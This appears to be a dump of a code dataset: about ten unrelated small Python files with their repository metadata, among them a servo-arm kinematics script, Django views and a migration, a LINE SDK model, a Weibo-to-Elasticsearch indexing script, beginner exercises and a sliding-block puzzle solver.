radFor2 = 1
elif radFor2 <-1:
radFor2 = -1
radFor3 = ((Ld ** 2)-(L1 ** 2)-(L2 ** 2))/(2*L1*L2)
if radFor3 > 1:
radFor3 = 1
elif radFor3 < -1:
radFor3 = -1
rad2 = math.acos(radFor2)+math.atan2(z,np.sqrt((x ** 2)+(y ** 2)))
rad3 = math.asin(radFor3)+(np.pi/2)
if 0<=rad2 and rad2<(np.pi/2):
servorad2 = (np.pi/2)-rad2
elif (np.pi/2)<= rad2 and rad2 <=np.pi:
servorad2 = -(np.pi-rad2)
else:
servorad2 = 0
#連続で動かす際は前回の値がいいけどな
if 0<=rad3 and rad3<(np.pi/2):
servorad3 = (np.pi/2)-rad3
elif (np.pi/2)<= rad3 and rad3 <=np.pi:
servorad3 = -(np.pi-rad2)
else:
servorad3 = 0
#これも連続の際は前回の値がいい
return [rad1, servorad2, servorad3]
def runServo1(servo1,arg1):
servo1.start(0.0)
servo1.ChangeDutyCycle(arg1*(9.5/np.pi)+7.25)
time.sleep(0.3)
servo1.stop()
def runServo2(servo2,arg2):
servo2.start(0.0)
servo2.ChangeDutyCycle(arg2*(9.5/np.pi)+7.25)
time.sleep(0.3)
servo2.stop()
def runServo3(servo3,arg3):
servo3.start(0.0)
servo3.ChangeDutyCycle(arg3*(9.5/np.pi)+7.25)
time.sleep(0.3)
servo3.stop()
def main():
GPIO.setmode(GPIO.BCM)
gp_out1 = 17
gp_out2 = 27
gp_out3 = 22
GPIO.setup(gp_out1, GPIO.OUT)
GPIO.setup(gp_out2, GPIO.OUT)
GPIO.setup(gp_out3, GPIO.OUT)
servo1 = GPIO.PWM(gp_out1, 50)
servo2 = GPIO.PWM(gp_out2, 50)
servo3 = GPIO.PWM(gp_out3, 50)
servo1.start(0.0)
servo2.start(0.0)
servo3.start(0.0)
args = calc(locationX,locationY,locationZ-20)
args2= calc(50,50,30)
print(args)
print(args[0]*57.2958)
print(args[1]*57.2958)
print(args[2]*57.2958)
thread_1 = threading.Thread(target=runServo1(servo1,args[0]))
thread_2 = threading.Thread(target=runServo2(servo2,args[1]))
thread_3 = threading.Thread(target=runServo3(servo3,args[2]))
thread_1.start()
thread_2.start()
thread_3.start()
time.sleep(1)
#print(args2[0]*57.2958)
#print(args2[1]*57.2958)
#print(args2[2]*57.2958)
#thread_4 = threading.Thread(target=runServo1(servo1,args2[0]))
#thread_5 = threading.Thread(target=runServo2(servo2,args2[1]))
#thread_6 = threading.Thread(target=runServo3(servo3,args2[2]))
#thread_4.start()
#thread_5.start()
#thread_6.start()
servo1.stop()
servo2.stop()
servo3.stop()
GPIO.cleanup()
if __name__ == "__main__":
main()
| [
"49942962+tagiituki@users.noreply.github.com"
] | 49942962+tagiituki@users.noreply.github.com |
ffd8d7f924ac71a1fcbac5e43212d5d188bd3f80 | cfc02900c2d46bc92388014a6c633589ea5e6862 | /SMSBazaarCore/migrations/0007_auto_20200927_1715.py | 58ab3d6823556c8beb44bfb0a7fe4d37487350af | [] | no_license | AlexandrosAliKhan/SMS-Bazaar | e8d6173c389aad37fa97c704617a0dfd936726f2 | 5eef06c908e9de0a73f5044e0c9c2e4bd9340ce1 | refs/heads/master | 2022-12-21T23:55:29.566705 | 2020-09-27T16:45:40 | 2020-09-27T16:45:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 366 | py | # Generated by Django 3.1.1 on 2020-09-27 14:15
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('SMSBazaarCore', '0006_item_vendor_ph_num'),
]
operations = [
migrations.RenameField(
model_name='item',
old_name='amount',
new_name='price',
),
]
| [
"axk1168@miami.edu"
] | axk1168@miami.edu |
819d89ad9b84dc64e53285ec72e4fee0a37decf8 | 6ceb45b74c581b5391cfd35a4a545222305175f3 | /0x0B-python-input_output/2-read_lines.py | 160e0ec606730cf2b90c907395838a96a28d973f | [] | no_license | drc288/holbertonschool-higher_level_programming | 8d8016d342f4fdac888f6f423c4e421eacc5bb6f | 6bd553b0f3711d5ef511a48551864cee598fe186 | refs/heads/master | 2020-07-22T23:58:55.696222 | 2020-02-14T00:30:16 | 2020-02-14T00:30:16 | 207,375,728 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 316 | py | #!/usr/bin/python3
def read_lines(filename="", nb_lines=0):
""" read_lines - read lines with nb_lines """
with open(filename, encoding="utf-8") as f:
if nb_lines <= 0:
print(f.read(), end="")
else:
for i in range(nb_lines):
print(f.readline(), end="")
| [
"davidroserocalle@gmail.com"
] | davidroserocalle@gmail.com |
6f20459b270ef8675b3858dc7ce711498a9e41c0 | 0472a11cf845be4f0f012fe40840e808875e04e9 | /bunkai/__init__.py | 3e1e90112db7d3dc3d36466b723c837bd7f8d614 | [
"Apache-2.0"
] | permissive | t-yamamura/bunkai | e4613a2c7eabe0cbb8660df3f0a4abe1e3375fc3 | 6a6da28329fbdde2a53176740d403ef96fab4f28 | refs/heads/main | 2023-06-15T00:20:02.181194 | 2021-07-07T00:42:55 | 2021-07-07T00:42:55 | 384,068,722 | 0 | 0 | Apache-2.0 | 2021-07-08T09:18:17 | 2021-07-08T09:18:16 | null | UTF-8 | Python | false | false | 150 | py | #!/usr/bin/env python3
from bunkai.algorithm.bunkai_sbd.bunkai_sbd import \
BunkaiSentenceBoundaryDisambiguation as Bunkai
__all__ = ['Bunkai']
| [
"yuta@hayashibe.jp"
] | yuta@hayashibe.jp |
7bb49342cb73134944d8a28f2c9d9644e7a2b854 | 073d30f4c9696125aeab0f887c1ae718233b67f6 | /boot.py | 28cde50d3ae0900f7c26ee5fcd49d4518f340fd7 | [] | no_license | senabo/diploma_esp | 0cef2f7fabf4064a084ceb8f44a9ee41c21eb472 | ee023cf294446b60e25be28469a8e0876fc0ba1e | refs/heads/master | 2022-11-06T07:18:31.939764 | 2020-06-23T19:00:22 | 2020-06-23T19:00:22 | 243,744,608 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | # This file is executed on every boot (including wake-boot from deepsleep)
# import esp
# esp.osdebug(None)
# import uos, machine, os
# uos.dupterm(None, 1) # disable REPL on UART(0)
import gc
# import webrepl
#
# webrepl.start()
#
gc.collect()
| [
"senabo33@gmail.com"
] | senabo33@gmail.com |
4a15b179983653f258889da66e12363550493cb6 | 5216d6ff0920e8efbca7c754006b3dea0548d034 | /myfirst/apps/shop/apps.py | 82d98870983493fa80eff29140d6759413364b2b | [] | no_license | VanyaZheltov/ubiquitous-palm-tree | e1c961f9ef473881c53ecd6a1460c79fd17ba7ed | bb95d1a89daede1d64295fe70503120644e485e7 | refs/heads/master | 2023-01-04T22:42:01.263730 | 2020-11-07T10:54:17 | 2020-11-07T10:54:17 | 294,415,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 119 | py | from django.apps import AppConfig
class ShopConfig(AppConfig):
name = 'shop'
verbose_name = 'Магазин'
| [
"zheltov86@live.ru"
] | zheltov86@live.ru |
8b218c6720db3557dc926056565b84482efb1e37 | 0030ce9ebd268c751c6358ac9637b934f255767f | /apile/wsgi.py | 3d94036f34444367a8adfaebae7ef429ed3280e3 | [] | no_license | momentum-cohort-2018-10/w5-apile-mo-tiana | f943f811c20e8df7f9329b0421baa31cda665403 | 669f4416845f92f4a558cf66a9c990ba977957ec | refs/heads/master | 2020-04-08T08:59:53.522230 | 2018-12-03T16:14:37 | 2018-12-03T16:14:37 | 159,202,994 | 1 | 2 | null | 2018-12-03T16:14:47 | 2018-11-26T16:54:26 | HTML | UTF-8 | Python | false | false | 387 | py | """
WSGI config for apile project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'apile.settings')
application = get_wsgi_application()
| [
"meagabeth@icloud.com"
] | meagabeth@icloud.com |
81ade5278aeab0a1197c12c2bde8a62122fad070 | 3f60b999ea7bda83c9586f75f52463dc20337f24 | /sensitive_user_portrait/cron/attribute/filter_sensitive_uid_text.py | d49971916dc61266df2f85bbccec815232885978 | [] | no_license | jianjian0dandan/sensitive_user_portrait | 629e49ce71db92b50634bac9c828811cdb5381e9 | cacc30267ebc0e621b1d48d4f1206277a0f48123 | refs/heads/master | 2021-01-20T23:18:07.138057 | 2016-05-22T12:09:40 | 2016-05-22T12:09:40 | 42,869,287 | 0 | 0 | null | 2015-09-21T13:55:12 | 2015-09-21T13:55:11 | null | UTF-8 | Python | false | false | 4,249 | py | # -*- coding: utf-8 -*-
import csv
import os
import sys
import time
from elasticsearch import Elasticsearch
from DFA_filter import sensitive_words_extract
reload(sys)
sys.path.append('./../flow1/')
from csv2json import itemLine2Dict, csv2bin
sys.setdefaultencoding('utf-8')
f_file = open('es_error.txt', 'wb')
CSV_FILE_PATH = '/home/ubuntu8/data1309/20130901'
uid_csv_path = './../recommend_in/'
uid_csv = 'sensitive_uid_list.txt'
es = Elasticsearch('219.224.135.93:9206')
count_n = 0
tb = time.time()
uid_set = set()
with open (os.path.join(uid_csv_path, uid_csv), 'rb') as t:
for line in t:
uid = line.strip()
uid_set.add(uid)
count_n += 1
uid_text = file('sensitive_uid_text_1.csv', 'wb')
writer = csv.writer(uid_text)
count = 0
count_f = 0
bulk_action = []
file_list = set(os.listdir(CSV_FILE_PATH))
print "total file is ", len(file_list)
for each in file_list:
with open(os.path.join(CSV_FILE_PATH, each), 'rb') as f:
try:
for line in f:
count_f += 1
weibo_item = itemLine2Dict(line)
if weibo_item:
weibo_item_bin = csv2bin(weibo_item)
if int(weibo_item_bin['sp_type']) != 1:
continue
#if not str(weibo_item_bin['uid']) in uid_set:
# continue
text = weibo_item_bin['text']
message_type = 0
if weibo_item_bin['message_type'] == 1:
write_text = text
message_type = 1
elif weibo_item_bin['message_type'] == 2:
temp = text.split('//@')[0].split(':')[1:]
write_text = ''.join(temp)
message_type = 2
elif weibo_item_bin['message_type'] == 3:
write_text = text
message_type = 3
else:
continue
if not isinstance(write_text, str):
text = text.encode('utf-8', 'ignore')
'''
if text:
sw_dict = sensitive_words_extract(text)
if not sw_dict:
sensitive = 0
else:
seneitive = 1
'''
origin_text = weibo_item_bin['text'].encode('utf-8', 'ignore')
item = [str(weibo_item_bin['uid']), str(weibo_item_bin['mid']), str(weibo_item_bin['send_ip']), str(weibo_item_bin['timestamp']), message_type, str(weibo_item_bin['root_uid']), str(weibo_item_bin['root_mid']), origin_text ]
key_list = ['uid', 'mid', 'ip', 'timestamp', 'message_type','root_uid', 'root_mid', 'text']
item_dict = dict()
for i in range(len(key_list)):
item_dict[key_list[i]] = item[i]
_id = item[1]
action = {'index': {'_id': _id}}
bulk_action.extend([action, item_dict])
count += 1
if count % 1000 == 0:
if bulk_action:
es.bulk(bulk_action, index='weibo_text', doc_type='text', timeout=30)
bulk_action = []
'''
except Exception, r:
time_date = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
f_file.write(time_date + '\t' + r + '\n')
'''
print count, count_f
#if write_text != "":
# writer.writerow(item)
# count += 1
if count_f % 10000 == 0:
ts = time.time()
print "%s per %s second" %(count_f, ts-tb)
print "have get %s" % count
tb = ts
except SystemError:
print "system error"
except Exception, r:
print Exception, r
print bulk_action
| [
"1257819385@qq.com"
] | 1257819385@qq.com |
08c9ef333e0f6b35aa3d5c8d6bfc3f853730ff9b | 53bec46772d2bfce166970fc5f3ac3c4b5ec1d12 | /math_print.py | 43ed6c5fa387fd1715e57ed4fcc301e4457d5a03 | [] | no_license | lappazos/Intro_Ex_1_Turtle | b1155d7b78bbc3db1755da85a22661b0fd87e9a6 | 7fc9cf0ea877da2461d247da48474e5c1943bc5b | refs/heads/master | 2020-04-05T04:02:58.580281 | 2018-11-07T11:24:19 | 2018-11-07T11:24:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,789 | py | #############################################################################
# FILE : math_print.py
# WRITER : Lior Paz, lioraryepaz, 206240996
# EXERCISE : intro2cs ex1 2017-2018
# DESCRIPTION : a program that prints out different math values using math
# functions.
#############################################################################
# The next line imports math module into the program
import math
def golden_ratio():
# These next lines define a function that prints the value of the golden ratio
print((1+math.sqrt(5))/2)
# The next line ends this function definition.
return
def six_square():
# These next lines define a function that prints the value of six square.
print(math.pow(6,2))
# The next line ends this function definition.
return
def hypotenuse():
# These next lines define a function that prints the value of the hypotenuse
# in a right triangle with legs of 5 & 12.
print(math.sqrt(math.pow(12,2)+math.pow(5,2)))
# The next line ends this function definition.
return
def pi():
# These next lines define a function that prints the value of pi.
print(math.pi)
# The next line ends this function definition.
return
def e():
# These next lines define a function that prints the value of e.
print(math.e)
# The next line ends this function definition.
return
def squares_area():
# These next lines define a function that prints the values of different 10
# squares areas, with side lengths going 1-10.
print(1*1, 2*2, 3*3, 4*4, 5*5, 6*6, 7*7, 8*8, 9*9, 10*10)
# The next line ends this function definition.
return
# The next commands prints different math values I previously defined.
golden_ratio()
six_square()
hypotenuse()
pi()
e()
squares_area() | [
"noreply@github.com"
] | lappazos.noreply@github.com |
0e947006909b0864fa274275292cb470b8b8abb2 | 85c231cde886155a72b2bcef10d974e0507005f6 | /mydjango/mydjango/views.py | 6d31ca59d0fcc8802a3ec1d7053b832524d74b15 | [] | no_license | liuyu82910/python_project | ab720912099160ce0c089ab30ec02453678374ec | d97be5e7b81acef68af5836a54ec6b41cd9b1882 | refs/heads/master | 2022-12-25T04:05:30.834678 | 2020-08-15T07:11:48 | 2020-08-15T07:11:48 | 278,800,357 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,258 | py | from django.http import HttpResponse, Http404
from datetime import datetime as dt
from datetime import timedelta as td
# from django.template.loader import get_template
# from django.template import Context
from django.shortcuts import render_to_response
def hello(request):
return HttpResponse("Hello world")
def current_time(request):
now=dt.now()
html="<html><body><h1 style='background-color: tomato; color:white'>It is now %s ^___^</h1></body></html>" \
% now.strftime('%H:%M:%S, %B %d, %Y')
return HttpResponse(html)
def time_difference(request, offset):
try:
offset= round(float(offset))
except ValueError:
raise Http404()
timediff=dt.now()+td(hours=offset)
# html="<html><body><h1 style='font-size:50px; color: blue;text-align:center; border: 2px solid tomato; " \
# "border-radius: 5px; width:1000px; height: 60px;'>" \
# "In %s hour(s), it will be %s </h1></body></html>" % (offset, timediff)
return render_to_response('time_diff.html',{'timediff': timediff.strftime('%H:%M:%S, %B/%d/%Y'),'offset': offset})
def cur_datetime(reqeust):
now=dt.now()
return render_to_response('cur_datetime.html',{'currentdatetime': now.strftime('%H:%M:%S, %B %d, %Y')})
| [
"liuyu910@gmail.com"
] | liuyu910@gmail.com |
ef9249722a55ff00c9ec100a856e360d1281320d | 5e255ad1360c90478393744586663741a9569c21 | /linebot/v3/audience/models/create_audience_group_request.py | 3d855e668830bb2b753b6d12e2288f9444ee979f | [
"Apache-2.0"
] | permissive | line/line-bot-sdk-python | d76268e8b542060d6eccbacc5dbfab16960ecc35 | cffd35948238ae24982173e30b1ea1e595bbefd9 | refs/heads/master | 2023-08-31T22:12:31.698183 | 2023-08-28T01:10:09 | 2023-08-28T01:10:09 | 70,553,423 | 1,898 | 1,181 | Apache-2.0 | 2023-09-11T05:14:07 | 2016-10-11T03:42:26 | Python | UTF-8 | Python | false | false | 3,502 | py | # coding: utf-8
"""
LINE Messaging API
This document describes LINE Messaging API. # noqa: E501
The version of the OpenAPI document: 0.0.1
Generated by OpenAPI Generator (https://openapi-generator.tech)
Do not edit the class manually.
"""
from __future__ import annotations
import pprint
import re # noqa: F401
import json
from typing import List, Optional
from pydantic.v1 import BaseModel, Field, StrictBool, StrictStr, conlist, constr
from linebot.v3.audience.models.audience import Audience
class CreateAudienceGroupRequest(BaseModel):
"""
Create audience for uploading user IDs (by JSON)
https://developers.line.biz/en/reference/messaging-api/#create-upload-audience-group
"""
description: Optional[constr(strict=True, max_length=120)] = Field(None, description="The audience's name. This is case-insensitive, meaning AUDIENCE and audience are considered identical. Max character limit: 120 ")
is_ifa_audience: Optional[StrictBool] = Field(None, alias="isIfaAudience", description="To specify recipients by IFAs: set true. To specify recipients by user IDs: set false or omit isIfaAudience property. ")
upload_description: Optional[StrictStr] = Field(None, alias="uploadDescription", description="The description to register for the job (in jobs[].description). ")
audiences: Optional[conlist(Audience, max_items=10000)] = Field(None, description="An array of user IDs or IFAs. Max number: 10,000 ")
__properties = ["description", "isIfaAudience", "uploadDescription", "audiences"]
class Config:
"""Pydantic configuration"""
allow_population_by_field_name = True
validate_assignment = True
def to_str(self) -> str:
"""Returns the string representation of the model using alias"""
return pprint.pformat(self.dict(by_alias=True))
def to_json(self) -> str:
"""Returns the JSON representation of the model using alias"""
return json.dumps(self.to_dict())
@classmethod
def from_json(cls, json_str: str) -> CreateAudienceGroupRequest:
"""Create an instance of CreateAudienceGroupRequest from a JSON string"""
return cls.from_dict(json.loads(json_str))
def to_dict(self):
"""Returns the dictionary representation of the model using alias"""
_dict = self.dict(by_alias=True,
exclude={
},
exclude_none=True)
# override the default output from pydantic.v1 by calling `to_dict()` of each item in audiences (list)
_items = []
if self.audiences:
for _item in self.audiences:
if _item:
_items.append(_item.to_dict())
_dict['audiences'] = _items
return _dict
@classmethod
def from_dict(cls, obj: dict) -> CreateAudienceGroupRequest:
"""Create an instance of CreateAudienceGroupRequest from a dict"""
if obj is None:
return None
if not isinstance(obj, dict):
return CreateAudienceGroupRequest.parse_obj(obj)
_obj = CreateAudienceGroupRequest.parse_obj({
"description": obj.get("description"),
"is_ifa_audience": obj.get("isIfaAudience"),
"upload_description": obj.get("uploadDescription"),
"audiences": [Audience.from_dict(_item) for _item in obj.get("audiences")] if obj.get("audiences") is not None else None
})
return _obj
| [
"noreply@github.com"
] | line.noreply@github.com |
c155d07d27b831ab729a74bb6b147a589478f3e5 | b276cd464e7680fcf1b755fccea434ff98699fbb | /slide_new.py | ea12644286fed5a9781e4002b24c94f4acc7cc63 | [] | no_license | justingiardino/SlideFinal | a32168972ebb4c07f99ce494446605452b2a8eca | e2ea2b95fd3040fa1244cc17af926408fef1d577 | refs/heads/master | 2021-05-17T16:09:52.747875 | 2020-03-28T18:27:28 | 2020-03-28T18:27:28 | 250,863,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,893 | py | import copy
import time
import breadth_first_search
import sys
import os
#ran into recursion error
sys.setrecursionlimit(10000)
class Board(object):
def __init__(self):
self.v_size = 0 #board height
self.h_size = 0 #board width
self.blank_board =[] #used in print_board, initialize after getting board size
self.piece_list = [] #keep track of all pieces
self.piece_objects = {} # keep track of piece attributes at each vertex in format of {vertex1:{piece1:{start_v:v1-1, start_h:h1-1,length:l1, direction,d1},piece2:{start_v:v1-2, start_h:h1-2,length:l2, direction,d2}}, vertex2:{piece1:{start_v:v2-1, start_h:h2-1,length:l1, direction,d1},piece2:{start_v:v2-2, start_h:h2-2,length:l2, direction,d2}}
self.board_objects = {} # keep track of what board looks like at each vertex
self.vertex_dict = {} # keep track of vertex adjacencies
self.end_vertices = [] # keep track of vertices that result in the game being won
self.final_graph = {} # dictionary of sets to be passed to breadth first seach
self.final_solutions = [] # shortest solution list, may just be one item
print("Welcome to the newest slide puzzle solver!\n")
self.debug_mode = int(input("Would you like to turn on debug mode?\n1) Yes\n2) No\n>"))
self.load_board()
print("\n\n" + "*"*20 + "\nBoard loaded, starting solver")
self.vertex_dict[0] = []
start = time.time()
self.solve_puzzle(0)
end = time.time()
build_graph_time = round((end - start), 4)
input(f"Finished analyzing all moves!\nTime elapsed: {build_graph_time} seconds\nDetermining best path..\n>")
#changed to bfs
self.find_best_path_bfs()
self.print_final_solutions()
print("""
_______ _ _____ _ _
|__ __(_) / ____| | | | _
| | _ _ __ ___ ___ | (___ | |_ __ _| |_ ___ (_)
| | | | '_ ` _ \ / _ \ \___ \| __/ _` | __/ __|
| | | | | | | | | __/ ____) | || (_| | |_\__ \ _
|_| |_|_| |_| |_|\___| |_____/ \__\__,_|\__|___/ (_)
""")
print(f"\n\t\tPre-processing: {build_graph_time} seconds\n\t\tPath finding: {self.bfs_time} seconds")
#add border print later
def print_board_simple(self, current_board):
for v in range(self.v_size):
for h in range(self.h_size):
print(current_board[v][h],end='')
print("")
#debugging only
def print_piece_stats(self, current_vertex):
for piece in self.piece_objects[current_vertex].keys():
print(f"Piece: {piece}\nStart_v: {self.piece_objects[current_vertex][piece]['start_v']}\nStart_h: {self.piece_objects[current_vertex][piece]['start_h']}\nLength: {self.piece_objects[current_vertex][piece]['length']}\nDirection: {self.piece_objects[current_vertex][piece]['direction']}\n")
#initialize board display with pieces
def build_print_board(self, current_vertex):
print("In print board")
#creating temporary show board
show_board = [['.' for x in range(self.h_size)] for y in range(self.v_size)]
#build show board based on current vertex
self.print_piece_stats(current_vertex)
for piece in self.piece_objects[current_vertex].keys():
print(f"Piece: {piece}")
#print horiztonal piece
if self.piece_objects[current_vertex][piece]['direction'] == 'h':
for h_off in range(self.piece_objects[current_vertex][piece]['length']):
show_board[self.piece_objects[current_vertex][piece]['start_v']][self.piece_objects[current_vertex][piece]['start_h']+h_off] = piece
#print vertical piece
elif self.piece_objects[current_vertex][piece]['direction'] == 'v':
for v_off in range(self.piece_objects[current_vertex][piece]['length']):
show_board[self.piece_objects[current_vertex][piece]['start_v']+v_off][self.piece_objects[current_vertex][piece]['start_h']] = piece
print(show_board)
self.board_objects[current_vertex] = show_board
# self.print_board_simple(show_board)
def load_board(self):
puzzle_choice = 0
puzzle_vals = [1,2,3,4,5,6]
while puzzle_choice not in puzzle_vals:
puzzle_choice = int(input("Which puzzle?\n1)Small\n2)Regular1\n3)Regular2\n4)Intermediate1\n5)Expert1\n6)Expert2\n>"))
if puzzle_choice == 1:
with open('Sliders/puzzle_layout_small.txt', 'r') as puzzle_read:
puzzle_in = puzzle_read.read().splitlines()
elif puzzle_choice == 2:
with open('Sliders/puzzle_layout.txt', 'r') as puzzle_read:
puzzle_in = puzzle_read.read().splitlines()
elif puzzle_choice == 3:
with open('Sliders/puzzle_layout2.txt', 'r') as puzzle_read:
puzzle_in = puzzle_read.read().splitlines()
elif puzzle_choice == 4:
with open('Sliders/puzzle_layout3.txt', 'r') as puzzle_read:
puzzle_in = puzzle_read.read().splitlines()
elif puzzle_choice == 5:
with open('Sliders/puzzle_layout4.txt', 'r') as puzzle_read:
puzzle_in = puzzle_read.read().splitlines()
elif puzzle_choice == 6:
with open('Sliders/puzzle_layout5.txt', 'r') as puzzle_read:
puzzle_in = puzzle_read.read().splitlines()
self.v_size = len(puzzle_in)
self.h_size = len(puzzle_in[0])
self.blank_board = [['.' for x in range(self.h_size)] for y in range(self.v_size)]
self.print_board_simple(puzzle_in)
print("Building board..")
invalid_piece_list = ['#','.','_']
#build board
self.piece_objects[0]= {}
for v in range(self.v_size):
for h in range(self.h_size):
#if finding for the first time, create dictionary value
current_piece = puzzle_in[v][h]
#only want to find letters
if(current_piece not in invalid_piece_list):
#initialize piece stats if it hasn't been added yet
if(current_piece not in self.piece_objects[0].keys()):
self.piece_objects[0][current_piece] = {'start_v':v, 'start_h':h,'length':1}
##check direction, won't be above or to the left and check boundaries, make sure you aren't in the last row or column
if(v < self.v_size-1):
if(puzzle_in[v+1][h] == current_piece):
#update direction as v - vertical
self.piece_objects[0][current_piece]['direction'] = 'v'
if(h < self.h_size-1):
if(puzzle_in[v][h+1] == current_piece):
#update direction as h - horizontal
self.piece_objects[0][current_piece]['direction'] = 'h'
#increment length if letter has already been added
else:
self.piece_objects[0][current_piece]['length']+=1
self.build_print_board(0)
#main recursive function
def solve_puzzle(self, current_vertex):
#check movability of each piece
for piece in self.piece_objects[current_vertex].keys():
print(f"Current vertex: {current_vertex} Current piece: {piece}\nCurrent board:")
self.print_board_simple(self.board_objects[current_vertex])
if self.debug_mode == 1:
print(f"Current vertex_dict: {self.vertex_dict}")
temp_board = copy.deepcopy(self.board_objects[current_vertex])
if self.debug_mode == 1:
input("Continue to check this piece\n>")
if self.piece_objects[current_vertex][piece]['direction'] == 'h':
print(f"piece: {piece} Direction: Horizontal")
#check move left
if self.piece_objects[current_vertex][piece]['start_h'] == 0:
print("Can't move left, boundary issue")
elif temp_board[self.piece_objects[current_vertex][piece]['start_v']][self.piece_objects[current_vertex][piece]['start_h']-1] != '.':
print("Can't move left, other piece in the way")
else:
print("Temporarily moving left")
temp_board[self.piece_objects[current_vertex][piece]['start_v']][self.piece_objects[current_vertex][piece]['start_h']-1] = piece
temp_board[self.piece_objects[current_vertex][piece]['start_v']][self.piece_objects[current_vertex][piece]['start_h'] + self.piece_objects[current_vertex][piece]['length']-1] = '.'
# print(temp_board)
self.print_board_simple(temp_board)
#if haven't already found this board, move to new vertex
if temp_board not in self.board_objects.values():
print("This move left has not been found before")
next_vertex = len(self.board_objects.keys())
print(f"Next vertex: {next_vertex}")
self.board_objects[next_vertex] = temp_board
if self.debug_mode == 1:
print(self.board_objects)
self.piece_objects[next_vertex] = copy.deepcopy(self.piece_objects[current_vertex])
self.piece_objects[next_vertex][piece]['start_h'] -= 1
#call recursion
self.vertex_dict[current_vertex].append(next_vertex)
self.vertex_dict[next_vertex] = []
if self.debug_mode == 1:
input("Stepping to next vertex\n>")
self.solve_puzzle(next_vertex)
#reset temp board on return
print(f"Returned from recursive function call.\nCurrent vertex: {current_vertex} Last piece moved: {piece}\nCurrent board:")
self.print_board_simple(self.board_objects[current_vertex])
if self.debug_mode == 1:
input(">")
temp_board = copy.deepcopy(self.board_objects[current_vertex])
#else have found it and want to skip
else:
#has to be in list format, grab 0th element which should be the only element
found_vertex = [key for (key,value) in self.board_objects.items() if value == temp_board][0]
print(found_vertex)
print(f"This move left has already been found at vertex: {found_vertex}")
self.vertex_dict[current_vertex].append(found_vertex)
#reprint the board?
#reset temp board
temp_board = copy.deepcopy(self.board_objects[current_vertex])
#check move right
if self.piece_objects[current_vertex][piece]['start_h'] + self.piece_objects[current_vertex][piece]['length'] + 1 > self.h_size:
print("Can't move right, boundary issue")
elif temp_board[self.piece_objects[current_vertex][piece]['start_v']][self.piece_objects[current_vertex][piece]['start_h'] + self.piece_objects[current_vertex][piece]['length']] != '.':
print("Can't move right, other piece in the way")
else:
print("Temporarily moving right")
temp_board[self.piece_objects[current_vertex][piece]['start_v']][self.piece_objects[current_vertex][piece]['start_h']] = '.'
temp_board[self.piece_objects[current_vertex][piece]['start_v']][self.piece_objects[current_vertex][piece]['start_h'] + self.piece_objects[current_vertex][piece]['length']] = piece
self.print_board_simple(temp_board)
if temp_board not in self.board_objects.values():
print("This move right has not been found before")
next_vertex = len(self.board_objects.keys())
print(f"Next vertex: {next_vertex}")
self.board_objects[next_vertex] = temp_board
if self.debug_mode == 1:
print(self.board_objects)
self.piece_objects[next_vertex] = copy.deepcopy(self.piece_objects[current_vertex])
self.piece_objects[next_vertex][piece]['start_h'] += 1
#call recursion
self.vertex_dict[current_vertex].append(next_vertex)
self.vertex_dict[next_vertex] = []
#check for game over before stepping again in recursion, only on move right because x moving right is the only way to win
if piece == 'x':
#assuming length of 2
print(f"Checking for game over -adding 1 to start_h\nNext x starth_h: {self.piece_objects[next_vertex]['x']['start_h']} h_size: {self.h_size}")
if self.piece_objects[next_vertex]['x']['start_h'] + 2 == self.h_size:
if self.debug_mode == 1:
input("This move solves the puzzle!\n>")
self.end_vertices.append(next_vertex)
print(f"Current end vertices: {self.end_vertices}")
break
# check for game over
if self.debug_mode == 1:
input("Stepping to next vertex\n>")
self.solve_puzzle(next_vertex)
#reset temp board on return
print(f"Returned from recursive function call.\nCurrent vertex: {current_vertex} Last piece moved: {piece}\nCurrent board:")
self.print_board_simple(self.board_objects[current_vertex])
if self.debug_mode == 1:
input(">")
temp_board = copy.deepcopy(self.board_objects[current_vertex])
else:
#has to be in list format, grab 0th element which should be the only element
found_vertex = [key for (key,value) in self.board_objects.items() if value == temp_board][0]
print(found_vertex)
print(f"This move right has already been found at vertex: {found_vertex}")
self.vertex_dict[current_vertex].append(found_vertex)
#reset temp board
temp_board = copy.deepcopy(self.board_objects[current_vertex])
#vertical
else:
print(f"piece: {piece} Direction: Vertical")
#check move up
if self.piece_objects[current_vertex][piece]['start_v'] == 0:
print("Can't move up, boundary issue")
elif temp_board[self.piece_objects[current_vertex][piece]['start_v']-1][self.piece_objects[current_vertex][piece]['start_h']] != '.':
print("Can't move up, other piece in the way")
else:
print("Temporarily moving up")
temp_board[self.piece_objects[current_vertex][piece]['start_v']-1][self.piece_objects[current_vertex][piece]['start_h']] = piece
temp_board[self.piece_objects[current_vertex][piece]['start_v'] + self.piece_objects[current_vertex][piece]['length']-1][self.piece_objects[current_vertex][piece]['start_h']] = '.'
self.print_board_simple(temp_board)
if temp_board not in self.board_objects.values():
print("This move up has not been found before")
next_vertex = len(self.board_objects.keys())
print(f"Next vertex: {next_vertex}")
self.board_objects[next_vertex] = temp_board
if self.debug_mode == 1:
print(self.board_objects)
self.piece_objects[next_vertex] = copy.deepcopy(self.piece_objects[current_vertex])
self.piece_objects[next_vertex][piece]['start_v'] -= 1
#call recursion
self.vertex_dict[current_vertex].append(next_vertex)
self.vertex_dict[next_vertex] = []
if self.debug_mode == 1:
input("Stepping to next vertex\n>")
self.solve_puzzle(next_vertex)
#reset temp board on return
print(f"Returned from recursive function call.\nCurrent vertex: {current_vertex} Last piece moved: {piece}\nCurrent board:")
self.print_board_simple(self.board_objects[current_vertex])
if self.debug_mode == 1:
input(">")
temp_board = copy.deepcopy(self.board_objects[current_vertex])
else:
#has to be in list format, grab 0th element which should be the only element
found_vertex = [key for (key,value) in self.board_objects.items() if value == temp_board][0]
print(found_vertex)
print(f"This move up has already been found at vertex: {found_vertex}")
self.vertex_dict[current_vertex].append(found_vertex)
#removing this logic from all moves, not sure if I want to do this
